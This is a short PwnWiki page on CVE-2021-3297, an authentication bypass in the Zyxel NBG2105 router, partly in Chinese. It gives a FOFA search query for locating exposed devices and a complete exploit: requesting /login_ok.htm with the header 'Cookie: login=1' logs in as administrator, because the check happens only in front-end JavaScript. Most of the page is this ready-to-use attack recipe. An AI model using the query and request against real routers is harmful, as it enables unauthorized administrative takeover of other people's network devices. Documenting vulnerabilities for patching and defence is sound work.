CVE-2021-3297 Zyxel NBG2105 authentication bypass vulnerability

From PwnWiki

Revision as of 16:06, 6 April 2021 by Pwnwiki (talk | contribs) (Created page with "==Vulnerability Impact==")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎English • ‎español • ‎中文（繁體）‎

Vulnerability Impact

Zyxel NBG2105

FOFA

app="ZyXEL-NBG2105"

The front-end file /js/util_gw.js has the front-end verification of the Cookie login parameter.

請求如下則會以管理員身份跳轉到 home.htm頁面。


http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-3297_Zyxel_NBG2105_身份驗證繞過漏洞/en&oldid=1041"